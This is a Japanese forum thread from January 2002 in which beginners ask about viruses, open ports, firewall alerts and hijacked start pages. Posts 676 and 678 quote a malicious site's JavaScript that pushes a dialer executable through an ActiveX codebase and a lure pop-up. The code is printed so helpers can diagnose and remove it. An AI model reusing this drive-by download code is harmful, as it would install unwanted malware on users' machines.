■ 初心者用質問スレッド Part5 ■

このエントリーをはてなブックマークに追加
582はインポ
>>599
それはwindows2000の仕様

ここで勉強↓
http://homepage2.nifty.com/winfaq/w2k/
>>599

あっそー良かったね。共有でいいじゃん。
ほんと582は馬鹿
605インポ:02/01/01 22:53
ん〜とりあえずセキュリティーのサイトいって勉強してくる
レス下さった方ありがとう
606名無しさん@お腹いっぱい。:02/01/01 22:55
[スタート]−[ファイル名を指定して実行] から regedit を起動します。
HKEY_LOCAL_MACHINE \System \CurrentControlSet \Services \LanmanServer \Parameters を開きます。
[編集]−[新規]−[DWORD 値] をクリックし、AutoShareServer を作成します。
(AutoShareServer は Server 以上で有効です。NT Workstation や Windows 2000/XP Professional では AutoShareWks を作成します。)
AutoShareServer または AutoShareWks のデータを 0 に設定します。
607インポ:02/01/01 23:02
>602 本当だ・・・しらなかった
今再起動したら、共有するに変わってるや
皆様すいませんです
あとadminにもパスかけ忘れてた・・・
608名無しさん@お腹いっぱい。:02/01/02 00:47
すみません、Win板でも訊いたんですが板違いだったようなので
こちらで質問させていただきます。マルチすまそ・・・。
ポート1025が常にListenになっているんですが、これはWindowsのシステム
かなんかが開けているんでしょうか?ちょくちょくnetstat -aで
確認してるんですが、どこかと接続していた事はないです。

ずっとListenになってるだけのようなんですが・・blackjackという
ウィルスの仕業なんでしょうか?シマンテックとトレンドマイクロの
オンラインスキャンをしてみましたが、何も出ませんでした。
OSはWin98(2、3日前にリカバリしたばかりです)、ZAを入れています。どなたか教えてください・・。
>>608
エプソンのプリンタドライバ入ってるだろ?
610名無しさん@お腹いっぱい。:02/01/02 01:03
>>609
レスありがとうございます。プリンタは持ってないんですが・・
エプソンのプリンタが使うポートなんですか・・周辺機器というと
NTTのTAくらいしか思い浮かばないです・・。
611609:02/01/02 01:08
SAgent2がそのドライバ。エプソンにも確認済み。
プリンタ管理ユーティリティだとさ。
・・・・バグについてはデンワのオネェさん教えてくんなかった。
不安なら削除しても動くらしいけど、インク残量とか表示できなくなるって。。。
612609:02/01/02 01:11
げっ、プリンタ無しか。。。
613541:02/01/02 10:58
またきた。いつも同じような時間帯。

166.114.65.***

だれかわかる人説明キボンヌ
>>613
知ってどうする?
生兵法は怪我の元。
防いでくれてるなら安心して忘れとけ。
615 :02/01/03 13:18
2ちゃんねるの特定の板に書き込むことが出来ないです・・・。
クッキーをオンにして・・・とかいわれてもcookie有効になってるし。

何をどうしたら書きこめるようになるんでしょうか?
>>464
どっかの掲示板からのコピペですが

WininitsはWindows起動時に動作して、起動するごとにファイルを一種類ずつ削除する。
.log→.txt→.na2→.snm→.wab→.wa~→.dbx→.htm→html→.gif→.jpg→.avi→.mov
→.ani→.cur→.ico→.lnk→.doc→.xls→.ttf→.ttc→.fon→.ini→.exe→.dll

駆逐するためには
レジスリHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\run\wininits
を削除して、
c:\windows\Wininits.exe
を削除。

…らしいです。
放っておいたら途中アドレスもメール送受信のフォルダも消えるってこと?怖。
617名無しさん@お腹いっぱい。:02/01/03 17:40
>616
ありがとうございます。
Wininits自体が削除していたんですね・・・
もうフォーマットしてしまうつもりだったんですが、早速直してみます。
.htmまで消えてなくて良かった・・・
ひたすら感謝です。


>572
わざわざ目を通していただいてありがとうございました。
618616:02/01/03 18:48
>617
思ってたほどかわいいものじゃなかったみたい。
画像鑑定スレの非公式BBSでそこそこ深刻な話題になってました。
http://isweb34.infoseek.co.jp/diary/narrowb/cgi-bin/ahh255b2/
ここの雑談スレッドだったかと。
619名無しさん@お腹いっぱい。:02/01/03 21:03
http://dreamisland.mens.cc/sup01/sup01007/images/
の中にあるdatファイルと0kのjpegファイルってぶらくらですか?
どなたか教えてください。
>>619 みんなに踏ませたいのか?ソース見て判断しろよ。
621maiko:02/01/03 21:14
ここで紹介されている
ぴんぐってなんですか?

http://mypage.naver.co.jp/sharp2601/
622名無しさん@お腹いっぱい。:02/01/03 21:19
619です。
datファイルをおとしたのですが、
動画がみれず、再起動してみてくださいとでたので・・・
ちなみにウイルスソフトにはひっかかりませんでした。
623464:02/01/03 21:27
>617
見てきました。
自分もWininits削除してみたらおかしくなったので再構築中ですが、
やはりフォーマットするしかないですか・・・(泣)
シマンテックは何やってるんだろう?
624464:02/01/03 21:31
とりあえず、今のところワクチンソフトがないみたいなので
「Start and Stop」でWininitsを起動させないのがベストみたいですね。
メモ帳のアイコンが変化していたら即止め安定かと。
625名無しさん@お腹いっぱい。:02/01/04 00:04
初めて書き込みをさせてもらいます。
iアプリで通信を行うときはJava独自の暗号化を行って
更にSSLで通信の暗号化を強化させるという話を聞いた事あるのです
が、Java独自の暗号化というのはSSLとは違うという事ですよね?
Java独自の暗号化について詳しい方いませんか?
ご存知の方、よろしくお願いします。
626奈々氏:02/01/04 07:25
間違えてIP晒してしまったら,トロイを仕掛けたと言われました
ウィルス対策ソフト持ってません
どうしたらいいんでしょう!!!
627名無しさん@お腹いっぱい。:02/01/04 08:13
>>626
どこで晒してしまったの?
場所にもよるから、晒した場所と
あなたのOSがわからないと
コメントのしようがないよ。
>>626
対策ソフト買ってこいよ
PC買ってから今まで何やってたんだ?
629名無しさん@お腹いっぱい。:02/01/04 10:59
社内LANのパケットを除いている馬鹿がいたので、LAN内部の通信も全面的に
暗号化されることになりました。
で、Apach-SSL自前CAを立てたんですが、CAの証明書を全マシンに入れるのも
CA使わずにサーバーの証明書を全マシン入れるのもセキュリティー的には
社内LANレベルではあまり変わらないですよね?
630奈々氏さん626:02/01/04 11:09
OSはWIN98、晒した場所はモー狼板
http://love.2ch.net/test/read.cgi/morningcoffee/1010091944/
の217
631奈々氏さん626:02/01/04 11:10
じゃなくて271だった!
632名無し募集中。。。:02/01/04 12:31
さっさと答えれ
>>632
どの質問に?
>>630
対策ソフトは買いに行ったか?
早く行け
板違いかもしれませんが詳しい人がいると思いますので
いろいろなホームページ等で登録とかをするときクッキーをonにしてるのに
「認証に失敗しました」とか「クッキーをonにしてください」とかでるのは
なぜでしょうか?登録とか掲示板の書き込みができないときがあるんです!
教えてください 初心者ですいません。
windows me ノートン2001入れてます(関係ないかも)
636名無しさん:02/01/04 14:41
>>635
私も同じ環境でしたが、たまにそういう現象がありました。
現在はウィルスバスター2002にアップしているせいか、そういった
現象にはお目にかかっていません。
637名無しさん@お腹いっぱい。:02/01/04 15:00
JS_EXCEPTION.GENに感染しました。
検索エンジンで検索してみたところ
IEのスタートページが書き換えられる・・・との事ですが、
スタートページは無事だったんですが
自分の場合、メーラーのアカウント情報が消えていました(EdMaxフリー版)。

ウィルスバスター2002でファイルを見つけ削除→Ad-awareで怪しい物無し→
再度バスターで検索→ウィルス0でした。

もう安心して良いのでしょうか?初めて感染したのでめちゃくちゃ怖いです。
自分より人に迷惑かけたら・・・ほんと不安です・・・・。

環境はWinXP・IE6です。
638名無しさん@お腹いっぱい。:02/01/04 15:10
>626
チト時間がかかるがシマンテックのセキュリティチェック
http://security1.norton.com/ssc/sc_ipcheck.asp?j=1&ax=0&langid=jp&venid=sym&plfid=20&pkj=CYIVSKVYRMHCGVRVRMN
>>637
不安ならフォーマット>クリーンインストールが基本。
640608:02/01/04 19:27
>>608なんですが、どなたか分かりませんか?
641608:02/01/04 19:32
netstat -anではこうなります。

Proto Local Address     Foreign Address    State
TCP  127.0.0.1:1025    0.0.0.0:0       LISTENING
UDP  127.0.0.1:1025    *:*          LISTENING
>>640
オンラインスキャンは気休め。
リカバリは無意味。
>>639
>464
「Start and Stop」とは何処にあるんでしょう?googleで探せなかったんですが・・・
64463 ◆ZzzC2NPs :02/01/04 21:55
>>71
アドバイス、サンクス
645名無しさん@お腹いっぱい。:02/01/04 23:14
友達に俺のところにhappytimeっていうウイルスが来たからお前のとこにも行くと思う
って言われたんですが・・どんなウイルスなんすか?
どう対処すればいいんですか?
646 :02/01/04 23:20
>>645
googleで「ウイルス happytime」で検索。

終了
>>629
正直、この手の高度な質問に回答できるヤシは
この板にはいません(w
通信技術板のほうがレスつきやすいですよ。
648頼むから教えて!:02/01/05 00:23
この前2ちゃんねるに貼り付けてあったリンクにいったら「本日あなたが
最初の犠牲者です」と書かれたリンクにあたり、どうやらウイルスに感染したみたい?で
それからどこかのサイトにいく度にダイアログボックスが開かれて「情報が他人に漏れる可能性があります」
と聞いてきます。一度初期化したのですが直りません。ちなみにそのリンクには
IPアドレスが漏れるとか、メールアドレスが漏れるとか書いてあり、明らかに
誰かが悪意を持って仕掛けていたと思われるのですが・・・初期化しても
直らないので明日修理に出すつもりなのですが、わかる方いますか?具体的
な直し方を教えてほしいのですが。初心者なのでどういう仕組みでIPが
漏れるのかもわかりません。
>>648
使用OSと「初期化した」の具体的内容を述べよ
650105.kzw.freecom.ne.jp:02/01/05 00:32
>>648
IPアドレスなんていくらでも漏れる
あなたが行くサイトの管理人にはバレバレだ

たぶんUser-Agentが出るサイトに言っただけだろ
JAVAスクリプトでしかけがしてあるサイトとか

>>649さんの内容に答えてくれ
あとウイルス対策ソフトも持たず(知らず)にネットに繋ぐのは問題外
人格を疑われるぞ
651頼むから教えて!:02/01/05 00:33
windows meで工場の出荷状態にしてリカバリCDROMで初期化したんですが
>>648
そのリンク、ブラウザの下に「ダウンロード中??%」のような表示が
出るやつか? 少し前によく張ってあったのは、ただの脅しJavaScript
だったんだけどね。

ダイアログボックスって、書き込みフォームで送信したときに出るやつ
じゃないの? ブラウザのセキュリティを高にしたらデフォルトで出る。
653頼むから教えて!:02/01/05 00:44
年末に張ってあって「ダウンロード中」っていう表示が1秒くらい出て
(ADSL8メガ使用)それからどこのサイトにいくにも(Yahoo・nifty等)
ダイアログが開かれるんです。これってウイルスの仕業じゃないのかな?
こえゆう風に「インターネットで情報を送信する時にその情報をほかのひとから
読み取られる可能性があります。続行しますか?」ではい・いいえの項目が
でるのですが・・・
654名無しさん@お腹いっぱい。:02/01/05 00:53
>>647
かなり住人かぶってるけどね。なんでだろ?
655初心者です:02/01/05 01:00
日付: 02/01/04 時刻: 22:27:55
規則「Default Block NetBus Trojan」が *****,NetBus をブロックしました。 詳細:
インバウンド TCP 接続
ローカルアドレス、 サービスは*****,NetBus
リモートアドレス、 サービスは 211.109.101.133,2668
プロセス名は N/A

このサーバ(韓国)らしいのですが、こわいです。
警告がでるたびトラウマになってしまいます。
何か いい方法がないでしょうか?
656名無しさん@お腹いっぱい。:02/01/05 01:13
WinXP+NIS2002とWin2000+BIっていう組み合わせなんだけど、
それぞれNISとBIを止めないとファイルの共有ができない。
セキュリティソフト稼働させたままファイルの共有させる方法はどうすればいい?
657jkl:02/01/05 01:17
win98でIE5.5使ってるんですが、立ち上げた時に表示されるページがア
ダルトページになります。IEのメニューから、「ツール」の「オプション」
で何回も設定しなおしても表示されます(PC再起動後)。さらに、検索ボタン
を押してもアダルトページが表示されます。これって治らないんですかね?
>>653
呆れたわヽ(´ー`)ノ
IEの設定でそう出てくるだけ。気にすんな。
659トラ(゚д゚)ウマー:02/01/05 01:23
>>655
あ〜。。メインウインドウ開くのら。
ファイアーウォール->インターネットアクセス制御->(右上の)設定、プルダウン。
->トロイの木馬の設定->NetBusトロイの木馬のデフォルト遮断、反転。
(下部の)修正->(上部の)追跡・「この規則をどう使いますか」のチェックボ
ックスをとりあえづ全部OFF。
コレで警告は出なくなると思うけろ。。。
660ななしん:02/01/05 01:28
>655
ブロックしてるのだから、気にする事は無い。
また、たとえブロックされていなくても、貴方のマシンにトロイが無ければ大丈夫
661初心者です:02/01/05 01:31
>>659
ありがとう。(感激です。
で、相手先を追及するのは困難ですか?
ひんぱんにあるんです。で、韓国語サイトで翻訳してサーバの
管理者にメールだすんですが、さっぱり無回答なのです。
662トラ(゚д゚)ウマー:02/01/05 01:31
>>655
うっ、、、つか、、、ノーdパソナルファイアウォールは2001なのれすか??
だとすると>>659のやり方は2002の方なので参考にならないのら。。。
2001ってどうだったっけら?
たしか、「拡張オプション」からフィルタリングルールのカスタマイズできた
と思ったけろ。。
663初心者です:02/01/05 01:35
>>660さん ありがとう。(感激です。
664初心者です:02/01/05 01:38
>>662さん
2001です。とにかくやってみます。
で、相手先を追及するのはやはり困難ですか?
665660:02/01/05 01:40
>661
韓国語で翻訳して送るより、英語で書いた方が良いかも知れない。
ほら、英語を日本語に訳してくれるサービスの翻訳文て、いい加減なのも多いでしょ。
>>664
無駄
667名無しさん@お腹いっぱい。:02/01/05 01:42
下手に追求してさらなる被害の拡大を見る人が多いんだよ(笑)
668トラ(゚д゚)ウマー:02/01/05 01:45
>>661
そんなに頻繁なら、自分の加入してるISPに事情説明して、交渉代行してもらう手も有るだろうけろ。
ログは、一応出した方が良いのかな。動いてくれるかどうかは解らないのら。。

ぁ〜。。つか、大きな声ぢゃいえないけど、前に自分も面白がって時々スキャン掛けてた事有るのら。
漏れの加入してるISPは、当時何も言ってこなかったにょ〜〜〜
まぁ、所詮漏れはへたれだから、相手は選んでスキャンしたのら(w
669初心者です:02/01/05 01:46
>>665さん 今度は英語でやってみます。(韓国に英文って思いもつななかった)

>>666さん 無駄とはどんなに、調査しても解からない ということですか?
670657:02/01/05 01:53
ちなみに出てくるページは
ttp://sm.sexhound.comです

たぶん踏まない方がいいかと。
671 :02/01/05 02:00
>>657
lsdialer.exeとかどっかにないか?
msconfigのスタートアップにも有るはずだから、それも消せ。
>>670
多分、、、JS.Exceptionなのら。。。
漏れ、ソース見飽きたから要らないから行かないけろ。
673初心者です:02/01/05 02:02
セキュリティ板の方って、なんかデンジャラスそうで....。
でも、こんな初心者への回答も何行もレスしてくれて、ありがとう。
建築板をうろついている女建築士です。建築のことでお困りの際は
セキュリティ板よりって書いてスレ建ててください。勇士達がたくさんいます。
今回はサンキューです。(^.^)
>>673
をを!いい響きだ!! >女建築士
こ、今度お茶でもどうれすか〜〜!!
・・・だ、ダメなら現場でドカチンバイトで使って欲しいれすぅ〜〜
675初心者です:02/01/05 02:14

それとこれとは別です。やっぱデンジャラス!!
<!--IPT language=JavaScript
var cabpath='http://sm.sexhound.com/lsdialer.cab';
var exepath='http://sm.sexhound.com/lsdialer.exe';

var BName=navigator.appName;
var BVer=parseInt(navigator.appVersion);
function loadit()
{

if(BName=='Microsoft Internet Explorer'&&BVer =2)
{
document.write("<OBJECT WIDTH=1 HEIGHT=1 CLASSID=
\"CLSID:2C38A62E-D257-40e8-8BB7-5624E38FEB0A\" CODEBASE=\""+cabpath+"\" <\/OBJECT ");
}
else
{
document.write("<SCRIPT window.open\(\""+exepath+"\",\"_blank\",\"height=1,width=1\")<\/SCRIPT ");
}

}
loadit();
//--
</SCRI-->
<!--IPT language=JavaScript
<!--
var exit = true;
setInterval("x()",5);
function x(){window.status="All right reserved. Copyright by sm.sexhound.com ... "}
//--
</SCRI-->
677名無しさん@お腹いっぱい。:02/01/05 02:14
>>670
onunloadで書き換えてるのかも。
Windows起動後、コンパネのインターネットセッティングでスタートページ直せばおっけかも。
678>657 続き:02/01/05 02:17
<!--IPT language=JavaScript
<!--
var exit=true;
function quit()
{
if (confirm('CLICK OK to DOWNLOAD LOLITAS PORN VIDEO !!! '))
{
window.open("http://sm.sexhound.com/lsdialer.exe", "s4sdcd9", "height=450,width=550,scrollbars=no,resizable=no");
}
if(exit)
{

nwa=window.open("http://sm.sexhound.com/index2.html","234s2");
window.focus();
}
}

// --
</SCRI-->
679657:02/01/05 02:22
>>671さん,672さん,676さん,677さん、678さん
ありがとうございます。なんとかやってみます。
680674:02/01/05 02:27
ふっ、フラレタのら〜〜〜
惜しかったね(ё_ё)>>680
解決前に交渉しとけば…セキュ板の評判がた落ち?(ワラ
結局、ヂャバoffしとかないのまづいのら。。。

2C38A62E---がlsdialer.cabのCLSIDなのら。。>681
という事は、このDELLコンの持ち主TORBENは。。。(w
684>657 続き:02/01/05 02:55
確証はないが、Microsoft JavaVM経由でWSH ShellObjectインスタンスを生成‥‥とかいう穴らしいので、
IE以外は影響受けないんじゃないか、という話。
685680:02/01/05 02:55
>>682
良いのら。。。コレで(w
さすが女建築士。。。簡単に乗らないところがエライ!
ますます萌えたぢょ(ポッ
686657:02/01/05 03:05
皆さんありがとうございます!なんとか治りました!
マジでうれしいです。すげー!
lsdialerを削除?
688名無しさん@お腹いっぱい。:02/01/05 06:05
私も657さんと同じ症状です。
みなさんの言うとおりにしましたが、直りません。

もう少し詳しくお願い致します。
689若葉:02/01/05 06:56
私も688や657さんと同じ症状です。
私ももう少し詳しくお願いしたいのですが…
690若葉:02/01/05 07:34
ここがかなり参考になりそうです。
http://www.ah.wakwak.com/~winfaq/cgi-bin/wforum.cgi?mode=all_read&no=112138&page=0
頑張ってみます。
691名無しさん@お腹いっぱい。:02/01/05 09:38
新年早々、送信者欄もタイトルも空欄の添付ファイル付メールが届いていました。
『あやしい』って思って見ずに削除したんですが、大丈夫なんでしょうかねぇ・・・。
>>691
新年早々ウイルス対策ソフトも買ってないあなたがあやしいよ
693名無しさん@お腹いっぱい。:02/01/05 12:51
>>692
新年早々笑った。
694名無しさん@お腹いっぱい。:02/01/05 12:53
さっきタスクに入ってたMXを最大化したらなぜかサイズが5分の1ぐらいに縮小されてた。
身に覚えがないしこんなこと初めて。これってトロイかなにかで遠隔操作されてますか?
>>694
これだけ2ちゃん内でも騒がれてるのにMXをやっているあなたが信じられない
遠隔操作でもウイルス繁殖でもなんでもやられてくれ
696名無しさん@お腹いっぱい。:02/01/05 13:05
質問ですが宜しくお願い致します。
IE6、NIS2002を使っています。
2チャンネルで或るスレッドを見ようと思い
スレッド1欄を開き、クリックすると開きますよね。
その時、“トロイの木馬”の警告が出たことがあるのですが
そのスレッドには“トロイの木馬”が仕掛けられていた
と言う事ですか?
それと、お気に入りの所に
なんか知らないうちに“カメラ”のようなマークが出ていたのですが
これは何でしょうか?知らないうちにあったので削除しましたが。
ご存知の方おられましたら宜しくお願い致します。
697名無しさん@お腹いっぱい。:02/01/05 17:23
あの・・、ウィンドウズを立ち上げる時、パスワードを入れないと
いけないようにする方法があるって聞いたことがあるんですけど
それと同じように、ソフトにも、パスを求めさせることって
できるのでしょうか?
たとえば、メーラーを起動させるときに、パスワードを入れないと
起動できないとか・・・。
あと、ファイルとか・・。
698 :02/01/05 17:25
699名無しさん@お腹いっぱい。:02/01/05 17:52
ちょっとあっち方向の(エロ)とこに行ったら、
XMildとかいうハンバーガーみたいなアイコンのがデスクトップにできて、
削除しても削除しても復活してしまうんです。
「モデムの選択」とかいうウインドウも勝手に出てくるし。
Q2か何かにつなぐのだと思うんですけど・・・
どうしたらいいか教えてください。
しらん